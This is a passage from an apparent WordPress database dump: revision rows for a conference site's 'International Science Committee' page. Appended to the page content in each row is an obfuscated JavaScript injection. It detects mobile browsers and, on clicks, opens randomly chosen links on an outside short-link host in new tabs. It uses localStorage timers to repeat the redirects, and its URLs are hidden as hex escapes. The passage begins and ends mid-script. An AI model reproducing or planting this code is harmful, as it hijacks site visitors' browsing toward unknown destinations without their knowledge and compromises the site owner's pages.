_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-12-06 05:19:51','2022-12-06 05:19:51','',2876,'https://gsw2023.com/?p=3422',0,'revision','',0),
(3423,1,'2022-12-06 05:20:33','2022-12-06 05:20:33','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-12-06 05:20:33','2022-12-06 05:20:33','',2876,'https://gsw2023.com/?p=3423',0,'revision','',0),
(3424,1,'2022-12-06 05:21:27','2022-12-06 05:21:27','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 